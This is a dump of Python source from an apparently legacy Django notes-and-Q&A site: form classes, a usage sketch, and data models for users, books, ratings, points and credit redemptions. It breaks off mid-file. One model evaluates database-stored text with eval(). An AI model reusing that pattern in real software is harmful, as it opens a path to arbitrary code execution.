forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n state = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n country = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n mailing_address = forms.CharField(max_length=1024, widget=forms.Textarea, required=False)\n dob = forms.DateField(required=False, label='Birth date',\n help_text=\"eg: '10/25/06', '10/25/2006', '2006-10-25' \",\n widget=W_TEXT(30))\n sex = forms.ChoiceField(required=False)\n sex.choices = [('M', 'Male'), ('F', 'Female')]\n image = forms.ImageField(required=False)\n\n def clean(self):\n cleaned_data = self.cleaned_data\n password1 = cleaned_data.get('password1')\n password2 = cleaned_data.get('password2')\n\n if password1:\n if password1 != password2:\n del cleaned_data['password1']\n del cleaned_data['password2']\n raise forms.ValidationError('passwords do not match')\n\n return cleaned_data\n\nclass FeedbackForm(forms.Form):\n name = forms.CharField(max_length=100)\n email = forms.EmailField()\n feedback = forms.CharField(max_length=2048, widget=forms.Textarea)\n\nclass EmailForm(forms.Form):\n email = forms.EmailField(widget=W_TEXT())\n re_enter_email = forms.EmailField(label='Re-enter Email',\n widget=W_TEXT())\n\nclass InviteForm(forms.Form):\n emails = forms.CharField(max_length=2048, widget=forms.Textarea,\n help_text=\"Separate emails by ;\")\n message = forms.CharField(max_length=1024, widget=forms.Textarea,\n required=False)\n\nclass DynForm(forms.Form): \n \n def set_fields(self, fields):\n for k, f in fields:\n self.fields[k] = f\n\ndef make_notifications_form(data):\n klass = new.classobj('NotificationsForm', (DynForm,), {})\n obj = klass()\n\n for n in NoticeType.objects.all():\n if n.label.startswith('_'):\n continue\n \n field = forms.BooleanField(label = n.display,\n required=False, initial=data.get(n.label, False))\n\n 
obj.fields[n.label] = field\n\n return obj\n\nclass AddBookForm(forms.Form):\n title = forms.CharField(max_length=255, widget=W_TEXT())\n isbn = forms.CharField(max_length=32, required=False, widget=W_TEXT())\n\n tags = forms.CharField(max_length=1024,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n tags = [int(t.strip()) for t in tags.split(',') if t.strip()]\n tags = list(set(tags))\n return tags\n\nclass EditBookForm(forms.Form):\n title = forms.CharField(max_length=255)\n isbn = forms.CharField(max_length=30, required=False)\n image = forms.ImageField(required=False)\n\n tags = forms.CharField(max_length=1024,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n moderators = forms.CharField(max_length=1024, required=False,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n tags = [int(t.strip()) for t in tags.split(',') if t.strip()]\n tags = list(set(tags))\n return tags\n \n def clean_moderators(self):\n moderators = self.cleaned_data['moderators']\n moderators = [int(m.strip()) for m in moderators.split(',') if m.strip()]\n moderators = list(set(moderators))\n return moderators\n\nclass MailingAddressForm(forms.Form):\n mailing_address = forms.CharField(max_length=1024, widget=forms.Textarea, required=True)\n"
},
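make_notifications_form builds one BooleanField per NoticeType at runtime by creating a Form subclass with new.classobj and filling its fields dict. A usage sketch; the shape of the saved-preferences dict is assumed for illustration:

# keys are NoticeType labels, values are the user's saved preferences
saved = {'note_changed': True, 'question_add': False}
form = make_notifications_form(saved)

for label, field in form.fields.items():
    print label, field.initial  # labels missing from 'saved' default to False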
{
"alpha_fraction": 0.5850151181221008,
"alphanum_fraction": 0.5906693935394287,
"avg_line_length": 29.192455291748047,
"blob_id": "3af3ab2ddbe9102b0e0eadd90bfac9494f696837",
"content_id": "8191c7e86d051acc3f63902778aa7e3bc62b1709",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 47221,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 1564,
"path": "/www/core/models.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from decimal import Decimal\nfrom itertools import groupby\n\nimport simplejson as json\nimport Image\n\nfrom django.db import models, IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models.signals import post_save\nfrom django import template\n\nimport reversion\nimport notification.models as notification\nfrom markitup.fields import MarkupField\n\nfrom core.utils import xcode, urlsafe, get_target, HANDLING_CREDITS\nfrom core.utils import make_context, QuerySetFilter, parse_flags\n\nQ = models.Q\nLIMIT = 50\n\ndef user_post_save_handler(**kwargs):\n \n obj = kwargs['instance']\n \n if not isinstance(obj, User):\n return\n \n if 'created' not in kwargs:\n return\n \n if not kwargs['created']:\n return\n \n try:\n profile = UserProfile.objects.get(user=obj)\n except ObjectDoesNotExist:\n profile = UserProfile.objects.create(user=obj)\n stream = Stream.objects.create(title='for user: %s' % obj.username)\n profile.stream = stream\n profile.save()\n\n Note.add(profile, user=obj)\n\n followers = User.objects.filter(is_superuser=True)\n notification.send(followers, '_user_joined', {'user': obj})\n\npost_save.connect(user_post_save_handler)\n\ndef get_book(object):\n target = object\n\n while target:\n if isinstance(target, Book):\n return target\n \n target = getattr(target, 'target', None)\n\nclass Titled(models.Model):\n title = models.CharField(max_length=255)\n \n class Meta:\n abstract = True\n\nclass Editable(models.Model):\n def is_editable_by(self, user):\n return user.is_superuser or user.is_staff or user == self.user\n\n @property\n def edit_link(self):\n return ''\n \n class Meta:\n abstract = True\n\nclass Referred(models.Model):\n @property\n def ctype(self):\n return ContentType.objects.get_for_model(self)\n\n class Meta:\n abstract = True\n\nclass Followable(models.Model):\n followcount = models.IntegerField(db_index=True, default=0)\n\n followers = generic.GenericRelation('Follows',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def follow(self, user):\n try:\n f = self.followers.create(user=user)\n self.followcount += 1\n self.save()\n return f\n except IntegrityError:\n # Model has already been followed by this user\n # No more action is required. Ignore.\n pass\n\n def unfollow(self, user):\n try:\n obj = self.followers.get(user=user).delete()\n self.followcount -= 1\n self.save()\n except IntegrityError:\n # Model has already been followed by this user\n # No more action is required. Ignore.\n pass\n\n def unfollow(self, user):\n try:\n obj = self.followers.get(user=user).delete()\n self.followcount -= 1\n self.save()\n except ObjectDoesNotExist:\n # Model has not been followed by this user\n # No more action is required. 
Ignore.\n pass\n\n def followed_by(self, user):\n return True if self.followers.filter(user=user) else False\n\n @property\n def followers_link(self):\n return '/followers/%d/%d/' % (self.ctype.id, self.id)\n\nclass Rateable(models.Model):\n LEVELS = [2, 10, 50, 100, 1000, 10000, 100000, 1000000,\n 10000000, 100000000, 1000000000]\n\n tot_count = models.IntegerField(db_index=True, default=0)\n up_count = models.IntegerField(db_index=True, default=0)\n down_count = models.IntegerField(db_index=True, default=0)\n score = models.IntegerField(db_index=True, default=0)\n\n ratings = generic.GenericRelation('Ratings',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def notify_rating(self):\n if self.tot_count not in self.LEVELS:\n return\n\n RatingNotification.objects.create(target_type=self.ctype, target_id=self.id,\n num_ratings=self.tot_count)\n\n def rate_up(self, user):\n try:\n r = self.ratings.create(user=user, rating=Ratings.UP)\n self.tot_count += 1\n self.up_count += 1\n self.score += 1\n self.notify_rating()\n return r\n except IntegrityError:\n # Model has already been rated by this user\n pass\n\n def rate_down(self, user):\n try:\n r = self.ratings.create(user=user, rating=Ratings.DOWN)\n self.tot_count += 1\n self.down_count += 1\n self.score -= 1\n self.notify_rating()\n return r\n except IntegrityError:\n # Model has already been rated by this user\n pass\n\n @property\n def level(self):\n tot_count = self.tot_count\n\n for index, level_start in enumerate(self.LEVELS):\n if tot_count < level_start:\n return index + 1\n\n return len(self.LEVELS) + 1\n\nclass Flaggable(models.Model):\n flagcount = models.IntegerField(db_index=True, default=0)\n\n flaggers = generic.GenericRelation('Flags',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def flag(self, user):\n try:\n f = self.flaggers.create(user=user)\n self.flagcount += 1\n return f\n except IntegrityError:\n # Model has already been flagged by this user\n # No more action is required. Ignore.\n pass\n\n def unflag(self, user):\n try:\n obj = self.flaggers.get(user=user).delete()\n self.flagcount -= 1\n except ObjectDoesNotExist:\n # Model has not been flagged by this user\n # No more action is required. 
Ignore.\n            pass\n\nclass HasComments(models.Model):\n    commentcount = models.IntegerField(db_index=True, default=0)\n\n    comments = generic.GenericRelation('Comment',\n                                       content_type_field='target_type',\n                                       object_id_field='target_id')\n\n    class Meta:\n        abstract = True\n\n    def add_comment(self, user, text):\n        comment = self.comments.create(user=user, text=text)\n        self.commentcount += 1\n        self.save()\n        return comment\n\nclass RateFlag(Rateable, Flaggable):\n    class Meta:\n        abstract = True\n\nclass Linkable(models.Model):\n    @property\n    def link(self):\n        pass\n\n    class Meta:\n        abstract = True\n\nclass Tagable(models.Model):\n    tags = generic.GenericRelation('TagItem',\n                                   content_type_field='item_type',\n                                   object_id_field='item_id')\n\n    class Meta:\n        abstract = True\n\nclass Renderable:\n    TEMPLATE = ''\n    RENDER_ARGS = []\n    DEFAULT_FLAGS = 'text,addedby,rate,flag,follow,dateadded,context'\n    MODEL_DEFAULT_FLAGS = ''\n\n    def render(self, context, *args):\n        t = template.loader.get_template(self.TEMPLATE)\n\n        args = list(args)\n        request = context['request']\n\n        flags = {}\n\n        dflags = parse_flags(self.DEFAULT_FLAGS)\n        mdflags = parse_flags(self.MODEL_DEFAULT_FLAGS)\n        cur_flags = parse_flags(args.pop(0) if args else '')\n\n        flags.update(dflags)\n        flags.update(mdflags)\n        flags.update(cur_flags)\n\n        user_agent = request.META.get('HTTP_USER_AGENT', '')\n        if 'MSIE' in user_agent:\n            # Disable overlay in IE6 as it causes crash!\n            flags['is_overlay'] = False\n\n        # map each remaining positional arg onto its declared render arg name\n        R = self.RENDER_ARGS\n        kwargs = {}\n        if args and self.RENDER_ARGS:\n            kwargs = dict([(R[i], args[i]) for i in xrange(len(args))])\n\n        c = make_context(context)\n        c['obj'] = self\n        c['args'] = args\n        c['kwargs'] = kwargs\n        c['flags'] = flags\n        c['request'] = request\n        c['ref_path'] = context['ref_path'] if 'ref_path' in context else '/'\n        c['user'] = request.user\n\n        return t.render(c)\n\nclass GroupRenderer:\n    GROUP_TEMPLATE = ''\n\n    @classmethod\n    def render_group(self, context, items):\n        pass\n\nclass ItemGroup(Renderable):\n\n    def __init__(self, items):\n        self.items = items\n\n    def render(self, context, *args):\n        # pick last item as group handler\n        # not picking first item as it might\n        # be a different type\n        item = self.items[-1]\n\n        klass = item.target.__class__\n        return klass.render_group(context, self.items)\n\nclass HasAttachments(models.Model):\n\n    attachments = generic.GenericRelation('Attachment',\n                                          content_type_field='target_type',\n                                          object_id_field='target_id')\n\n    @property\n    def attachments_link(self):\n        return '/attachments/%d/%d/' % (self.ctype.id, self.id)\n\n    def can_attach(self, user):\n        if user.is_superuser or user.is_staff:\n            return True\n\n        if user == getattr(self, 'user', None):\n            return True\n\n        if hasattr(self, 'moderators'):\n            if user in self.moderators.all():\n                return True\n\n    def attach(self, user,\n               title='', description='',\n               url=None, ufile=None):\n\n        assert(url or ufile)\n\n        a = Attachment.objects.create(attacher=user, title=title,\n                                      description=description,\n                                      target_id=self.id,\n                                      target_type=self.ctype,\n                                      url=url,\n                                      uploaded_file=ufile)\n        return a\n\n    class Meta:\n        abstract = True\n\nclass UploadedFile(models.Model):\n    file = models.FileField(upload_to='uploads/%Y/%m/%d')\n    checksum = models.CharField(max_length=32, unique=True)\n    date_added = models.DateTimeField(auto_now_add=True)\n    verified = models.BooleanField()\n    uploader = models.ForeignKey(User)\n\n    @property\n    def user(self):\n        return self.uploader\n\nclass Attachment(Referred, RateFlag, Linkable, Renderable, Editable):\n    TEMPLATE = 'renderables/attachment.html'\n\n    
title = models.CharField(max_length=255, blank=True, null=True)\n description = MarkupField(null=True, blank=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n url = models.TextField(max_length=2048, null=True, blank=True)\n uploaded_file = models.ForeignKey(UploadedFile, null=True)\n date_added = models.DateTimeField(auto_now_add=True)\n attacher = models.ForeignKey(User)\n\n questions = generic.GenericRelation('Question',\n content_type_field='target_type',\n object_id_field='target_id')\n\n def is_target_book(self):\n return bool(get_book(self))\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n \n @property\n def edit_link(self):\n return '/attachment/edit/%d/' % self.id\n\n @property\n def user(self):\n return self.attacher\n\n @property\n def link(self):\n return '/attachment/%s/%s/' % (self.id, urlsafe(self.title)[:LIMIT])\n\n @property\n def verb(self):\n return 'attached'\n\n class Meta:\n unique_together = ('target_type', 'target_id', 'uploaded_file')\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50, unique=True, db_index=True)\n description = MarkupField(null=True, blank=True)\n\n class Meta:\n ordering = ('name',)\n\n def __unicode__(self):\n return self.name\n\nclass TagItem(models.Model):\n tag = models.ForeignKey(Tag)\n\n item_type = models.ForeignKey(ContentType)\n item_id = models.PositiveIntegerField(db_index=True)\n item = generic.GenericForeignKey('item_type', 'item_id')\n\n class Meta:\n unique_together = (('tag', 'item_type', 'item_id'),)\n\n def __unicode__(self):\n return u'%s [%s]' % (self.item, self.tag)\n\nclass Category(Tagable):\n QUERY_TYPES = (('any', 'Any'), ('all', 'All'))\n name = models.CharField(max_length=100, db_index=True)\n description = MarkupField(null=True, blank=True)\n parent = models.ForeignKey('self', null=True)\n query_type = models.CharField(max_length=8, null=False, blank=False,\n choices=QUERY_TYPES)\n\nclass LeaderBoardData(models.Model):\n\n tag = models.CharField(max_length=32, db_index=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n def __unicode__(self):\n return '<LeaderBoardData %s: %s>' % (self.tag, self.target)\n\nclass RatingNotification(models.Model):\n time = models.DateTimeField(auto_now_add=True, db_index=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n num_ratings = models.IntegerField()\n\n def __unicode__(self):\n return '<RatingNotification %s: %s>' % (self.target, self.num_ratings)\n\n\nclass Comment(Referred, Flaggable, Renderable, Editable):\n TEMPLATE = 'renderables/comment.html'\n GROUP_TEMPLATE = 'renderables/comment_group.html'\n\n user = models.ForeignKey(User)\n text = models.TextField(max_length=1024)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @classmethod\n def render_group(self, context, items):\n\n target = items[-1].target.target\n t = 
template.loader.get_template(self.GROUP_TEMPLATE)\n        c = make_context(context)\n        c['comments'] = items\n        c['target'] = target\n        return t.render(c)\n\n    def is_editable_by(self, user):\n        return Editable.is_editable_by(self, user)\n\n    @property\n    def edit_link(self):\n        return '/comment/edit/%d/' % self.id\n\n    @property\n    def title(self):\n        return 'Comment: %s' % xcode(self.text[:LIMIT])\n\n    @property\n    def link(self):\n        return self.target.link\n\nclass Activity(models.Model, Renderable):\n    TEMPLATE = 'renderables/activity.html'\n\n    ACTION_TYPES = (('added', 'Added'), ('modified', 'Modified'))\n\n    user = models.ForeignKey(User)\n    date_added = models.DateTimeField(auto_now_add=True)\n    target_type = models.ForeignKey(ContentType)\n    target_id = models.PositiveIntegerField(db_index=True)\n    target = generic.GenericForeignKey('target_type', 'target_id')\n    action = models.CharField(max_length=8, null=False, blank=False,\n                              default='added', choices=ACTION_TYPES)\n    data = models.TextField(max_length=1024, null=True, blank=True)\n\n    @classmethod\n    def add(self, user, target, action='added', data=None):\n        if target is None:\n            raise Exception('activity target cannot be None')\n\n        a = self.objects.create(user=user, data=repr(data),\n                                target_type = target.ctype,\n                                target_id = target.id,\n                                action=action)\n        return a\n\n    class Meta:\n        ordering = ('-id',)\n\nclass Stream(Titled):\n\n    def add(self, activity):\n        try:\n            sitem = StreamItem.objects.create(stream=self, activity=activity)\n        except IntegrityError:\n            # this (stream, activity) pair already exists; reuse it\n            sitem = StreamItem.objects.get(stream=self, activity=activity)\n\n        return sitem\n\n    def __unicode__(self):\n        return 'Stream: %d: %s' % (self.id, self.title)\n\nclass StreamItem(models.Model):\n\n    date_added = models.DateTimeField(auto_now_add=True)\n    stream = models.ForeignKey(Stream)\n    activity = models.ForeignKey(Activity)\n\n    class Meta:\n        unique_together = ('stream', 'activity')\n\n    def __unicode__(self):\n        return 'StreamItem: %d of %s: %s' % (self.id, self.stream, self.activity)\n\nclass Question(Referred, RateFlag, HasComments, Linkable, HasAttachments, Renderable, Editable):\n    TEMPLATE = 'renderables/question.html'\n    MODEL_DEFAULT_FLAGS = 'answercount,topanswer'\n\n    user = models.ForeignKey(User)\n    text = MarkupField()\n    date_added = models.DateTimeField(auto_now_add=True)\n    date_updated = models.DateTimeField(auto_now_add=True)\n\n    target_type = models.ForeignKey(ContentType)\n    target_id = models.PositiveIntegerField(db_index=True)\n    target = generic.GenericForeignKey('target_type', 'target_id')\n\n    def is_editable_by(self, user):\n        book = get_book(self)\n        book_editable = False\n        if book:\n            book_editable = book.is_editable_by(user)\n        return Editable.is_editable_by(self, user) or book_editable\n\n    @property\n    def title(self):\n        return 'Question: %s under %s' % (self.text.raw[:LIMIT], self.target.title)\n\n    @property\n    def top_answer(self):\n        # FIXME\n        if self.answer_set.all():\n            ans = Answer.objects.filter(question=self)[0]\n            return ans\n        else:\n            return None\n\n    @classmethod\n    def add(self, user, target, text):\n        q = self.objects.create(user=user, text=text,\n                                target_type = target.ctype,\n                                target_id = target.id)\n        return q\n\n    class Meta:\n        ordering = ('-score',)\n\n    @property\n    def link(self):\n        return '/qa/question/%s/%s/' % (self.id, urlsafe(self.text.raw[:LIMIT]))\n\n    def __unicode__(self):\n        return self.text.raw\n\nclass Answer(Referred, RateFlag, HasComments, Linkable, HasAttachments, Renderable, Editable):\n    TEMPLATE = 'renderables/answer.html'\n\n    user = models.ForeignKey(User)\n    question = 
models.ForeignKey(Question)\n text = MarkupField()\n\n date_added = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now_add=True)\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @property\n def title(self):\n return 'Answer: %s under %s' % (xcode(self.text.raw[:LIMIT]),\n xcode(self.question.text.raw[:LIMIT]))\n\n @property\n def target(self):\n return self.question\n\n class Meta:\n ordering = ('-score',)\n\n @property\n def link(self):\n return self.question.link\n \n def __unicode__(self):\n return self.text.raw\n\nclass FBUserProfile(models.Model):\n user = models.ForeignKey(User, unique=True)\n uid = models.CharField(max_length=100)\n\nclass UserProfile(Referred, RateFlag, Followable, Linkable, Renderable, Editable):\n\n # means: level 1: 0 to 9, level 2: 10 to 19 and so on.\n LEVELS = (10, 20, 40, 60, 80, 120, 160, 200, 240, 300, 360, 420, 500, 600,\n 700, 800, 1000, 1250, 1500, 2000)\n\n LEVEL_NAMES = (\n 'Wild Monkey',\n 'Chattering Monkey',\n 'Cheeky Monkey',\n 'Curious Monkey',\n 'Active Monkey',\n 'Power Monkey',\n 'Brainy Monkey',\n 'Genius Monkey',\n 'Learned Monkey',\n 'Master Monkey',\n 'Vedic Monkey',\n 'Guru Monkey',\n 'Shining Monkey',\n 'Monkey King',\n 'Monk Monkey',\n 'Monkey Monk',\n 'Budding Monk',\n 'Trainee Monk',\n 'Monk-to-be',\n 'Monk'\n )\n \n TEMPLATE = 'renderables/userprofile.html'\n\n user = models.ForeignKey(User, unique=True)\n stream = models.ForeignKey(Stream, unique=True, null=True)\n institution = models.CharField(max_length=200, null=True, blank=True)\n city = models.CharField(max_length=200, null=True, blank=True)\n state = models.CharField(max_length=200, null=True, blank=True)\n country = models.CharField(max_length=200, null=True, blank=True)\n dob = models.DateTimeField(null=True, blank=True)\n sex = models.CharField(max_length=1, null=True, blank=True)\n image = models.ImageField(upload_to='images/user/%Y/%m/%d')\n points = models.IntegerField(db_index=True, default=0)\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n mailing_address = models.TextField(null=True, blank=True)\n referrer = models.ForeignKey(User, null=True, db_index=True,\n related_name='referee')\n \n def is_editable_by(self, user):\n return Editable.is_editable_by(self, user)\n\n @property\n def books(self):\n return Book.objects.filter(Q(user=self.user) | Q(moderators__id=self.user.id))\n\n @property\n def following_books(self):\n target_type = ContentType.objects.get_for_model(Book)\n following = Follows.objects.filter(user=self.user,\n target_type=target_type)\n following = QuerySetFilter(following, lambda x: x.target)\n return following\n\n @property\n def referred(self):\n return UserProfile.objects.filter(referrer=self)\n\n @property\n def level(self):\n points = self.points\n\n for index, level_start in enumerate(self.LEVELS):\n if points < level_start:\n return index + 1\n\n return len(self.LEVELS)\n\n @property\n def level_name(self):\n return self.LEVEL_NAMES[self.level - 1]\n\n @property\n def points_for_current_level(self):\n return self.LEVELS[self.level - 1]\n\n def give_points(self, points):\n level = self.level\n self.points += points\n new_level = self.level\n\n if level == new_level:\n return\n\n # notify user and his followers about level change\n followers = [self.user]\n followers.extend([f.user for f in 
self.followers.all()])\n followers = list(set(followers))\n\n notification.send(followers, 'user_level_changed',\n {'user': self.user})\n\n # award points to referrer\n from core.points import give_points\n give_points('user_level_changed', user=self.user.id,\n prev_level=level, level=new_level)\n\n @property\n def points_history(self):\n return PointsHistory.objects.filter(user=self.user)\n\n @property\n def location(self):\n location = [self.city, self.state, self.country]\n location = [loc or '' for loc in location if loc]\n location = ', '.join(location)\n return location\n\n @property\n def title(self):\n return self.user.get_full_name().strip() or self.user.username\n\n @property\n def note(self):\n return Note.objects.get(target_id=self.id,\n target_type=self.ctype.id)\n \n @property\n def videos(self):\n video_type = ContentType.objects.get_for_model(Video)\n media = AssociatedMedia.objects.filter(user=self.user,\n media_type=video_type)\n return media\n \n @property\n def questions(self):\n return Question.objects.filter(user=self.user)\n \n @property\n def answers(self):\n return Answer.objects.filter(user=self.user)\n \n @property\n def notes(self):\n return Note.objects.filter(user=self.user)\n\n @property\n def comments(self):\n return Comment.objects.filter(user=self.user)\n \n @property\n def following(self):\n target_type = ContentType.objects.get_for_model(UserProfile)\n following = Follows.objects.filter(user=self.user,\n target_type=target_type)\n following = QuerySetFilter(following, lambda x: x.target)\n return following\n \n @property\n def activities(self):\n return Activity.objects.filter(user=self.user)\n\n @property\n def link(self):\n return '/user/%s/' % urlsafe(self.user.username)\n\n @property\n def can_add_book(self):\n return True\n\n def can_edit_book(self, book):\n return book.is_editable_by(self.user)\n\n @property\n def followers_link(self):\n return '/user/%s/followers/' % urlsafe(self.user.username)\n\n @property\n def following_books_link(self):\n return '/user/%s/fbooks/' % urlsafe(self.user.username)\n\n @property\n def following_link(self):\n return '/user/%s/following/' % urlsafe(self.user.username)\n\n\nclass Toppers(models.Model):\n user_profile = models.ForeignKey(UserProfile)\n\nclass Onliners(models.Model):\n user = models.ForeignKey(User)\n\nclass ProfilePost(Referred, RateFlag, HasComments, Renderable, Editable, Linkable):\n TEMPLATE = 'renderables/profilepost.html'\n MODEL_DEFAULT_FLAGS = 'comment'\n\n user = models.ForeignKey(User)\n profile = models.ForeignKey(UserProfile)\n text = models.TextField(max_length=1024)\n date_added = models.DateTimeField(auto_now_add=True)\n\n @property\n def edit_link(self):\n return '/profilepost/edit/%d/' % self.id\n\n @property\n def link(self):\n return '/profilepost/%d/' % self.id\n \n @property\n def target(self):\n return self.profile\n\n @property\n def type(self):\n return 'status'\n\n @property\n def title(self):\n return 'ProfilePost: %s' % (xcode(self.text[:LIMIT]))\n\nclass RedeemableItem(Titled, Renderable):\n TEMPLATE = 'renderables/redeemableitem.html'\n\n description = MarkupField(null=True, blank=True)\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n date_added = models.DateTimeField(auto_now_add=True, db_index=True)\n image = models.ImageField(upload_to='images/%Y/%m/%d')\n num = models.IntegerField(null=False, default=1, db_index=True)\n\n @property\n def link(self):\n return '/redeemable/%d/%s/' % (self.id, 
urlsafe(self.title[:LIMIT]))\n\n def __unicode__(self):\n return self.title\n\nclass Redemption(Referred, Renderable):\n TEMPLATE = 'renderables/redemption.html'\n\n date_added = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User)\n items = models.ManyToManyField(RedeemableItem, through='RedemptionItem')\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n date_processed = models.DateTimeField(null=True)\n \n @property\n def link(self):\n return '/redemption/%d/' % self.id\n\n @property\n def verb(self):\n return 'redeemed'\n\n @property\n def title(self):\n return 'Redemption by %s (order no: %d)' % \\\n (self.user.get_profile().title, self.id)\n\n def __unicode__(self):\n return 'order %d for user %s for %s credits' % (self.id,\n self.user, self.credits)\n\n @classmethod\n def add(self, cart_data, user):\n cart = []\n total_credits = Decimal('0.0')\n\n for item_id, num in cart_data:\n item = RedeemableItem.objects.get(id=int(item_id))\n\n if item.num < num:\n return\n\n total_credits += (item.credits * num)\n cart.append([item, num])\n\n total_credits += HANDLING_CREDITS\n\n profile = user.get_profile()\n if profile.credits < total_credits:\n return\n\n redemption = self.objects.create(user=user, credits=total_credits)\n\n for item, num in cart:\n r = RedemptionItem.objects.create(redemption=redemption, item=item, num=num)\n item.num -= num\n item.save()\n \n profile.credits -= total_credits\n profile.save()\n\n return redemption\n\nclass RedemptionItem(models.Model, Renderable):\n TEMPLATE = 'renderables/redemptionitem.html'\n\n redemption = models.ForeignKey(Redemption)\n item = models.ForeignKey(RedeemableItem)\n num = models.IntegerField(null=False, default=1)\n \n def __unicode__(self):\n return '%s item %d nos for order %d' % (self.item.title,\n self.num, self.redemption.id)\n\nclass PointsHistory(Renderable, Referred):\n TEMPLATE = 'renderables/pointshistory.html'\n GROUP_TEMPLATE = 'renderables/pointshistory_group.html'\n\n user = models.ForeignKey(User, db_index=True)\n date_added = models.DateTimeField(auto_now_add=True, db_index=True)\n points = models.IntegerField()\n code = models.CharField(max_length=32)\n data = models.TextField(max_length=2000)\n\n @property\n def edata(self):\n edata = eval(self.data)\n\n if 'target_type' in edata and 'target' in edata:\n target = get_target(edata['target_type'], edata['target'])\n edata['target'] = target\n del edata['target_type']\n\n return edata\n\n @property\n def has_all_rated_data(self):\n edata = self.edata\n return self.code == 'rated' and 'position' in edata\n\n @property\n def target(self):\n if self.code == 'rated':\n return self.edata['target']\n\n elif self.code == 'user_level_changed':\n try:\n return User.objects.get(id=self.edata['user']).get_profile()\n except ObjectDoesNotExist:\n pass\n\n @property\n def is_for_adding(self):\n edata = self.edata\n\n if not self.code == 'rated':\n return False\n\n if not self.has_all_rated_data:\n return False\n\n if isinstance(edata['target'], UserProfile):\n return False\n\n return edata['position'] == 0\n\n @property\n def get_rating(self):\n if not self.code == 'rated':\n return None\n\n return self.edata['target'].ratings.get(user=self.user)\n\n @property\n def verb(self):\n verb = 'rated'\n edata = self.edata\n\n if self.code == 'rated':\n if self.is_for_adding:\n verb = 'adding'\n else:\n verb = 'liking' if self.get_rating.rating == Ratings.UP else 'disliking'\n\n elif self.code == 
'user_level_changed':\n verb = 'referring'\n\n return verb\n\n @property\n def has_gained(self):\n return self.points > 0\n\n @property\n def signed_points(self):\n return '+%s' % self.points if self.has_gained else str(self.points)\n\n @property\n def sign(self):\n return '+' if self.has_gained else '-'\n\n @classmethod\n def render_group(self, context, items):\n\n activities = items[:]\n \n # group by user\n items.sort(key=lambda x: x.target.user.username)\n groups = groupby(items, lambda x: x.target.user)\n groups = [(k, list(citems)) for k, citems in groups]\n\n t = template.loader.get_template(self.GROUP_TEMPLATE)\n c = make_context(context)\n c['groups'] = groups\n c['activities'] = activities\n return t.render(c)\n\n @property\n def title(self):\n return '%s for %s %s' % (self.signed_points, self.verb, self.target.title)\n \n def __unicode__(self):\n return '<Points \"%s:%d\" for \"%s\">' % (self.code, self.points, self.user)\n\n class Meta:\n ordering = ('-date_added',)\n\nclass Note(Referred, RateFlag, Linkable, HasAttachments, Editable, Renderable):\n TEMPLATE = 'renderables/note.html'\n\n text = MarkupField()\n date_added = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, null=True)\n \n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n \n questions = generic.GenericRelation(Question,\n content_type_field='target_type',\n object_id_field='target_id')\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @classmethod\n def add(self, target, text='', user=None):\n q = self.objects.create(text=text, user=user, flagcount=0,\n target_type = target.ctype,\n target_id = target.id)\n return q\n\n class Meta:\n unique_together = ('target_type', 'target_id', 'user')\n ordering = ('-score',)\n \n @property\n def title(self):\n return 'Note: %s' % self.target.title\n\n @property\n def link(self):\n return '/note/%s/' % self.id\n\nif not reversion.is_registered(Note):\n reversion.register(Note, fields=['text', '_text_rendered'])\n\nclass Content(Referred, Linkable):\n date_added = models.DateTimeField(auto_now_add=True)\n _notes = generic.GenericRelation(Note, default='',\n content_type_field='target_type',\n object_id_field='target_id')\n questions = generic.GenericRelation(Question,\n content_type_field='target_type',\n object_id_field='target_id')\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n abstract = True\n\n @property\n def notes(self):\n return self._notes.all()\n\n @property\n def note(self):\n notes = self._notes.all()[:1]\n return 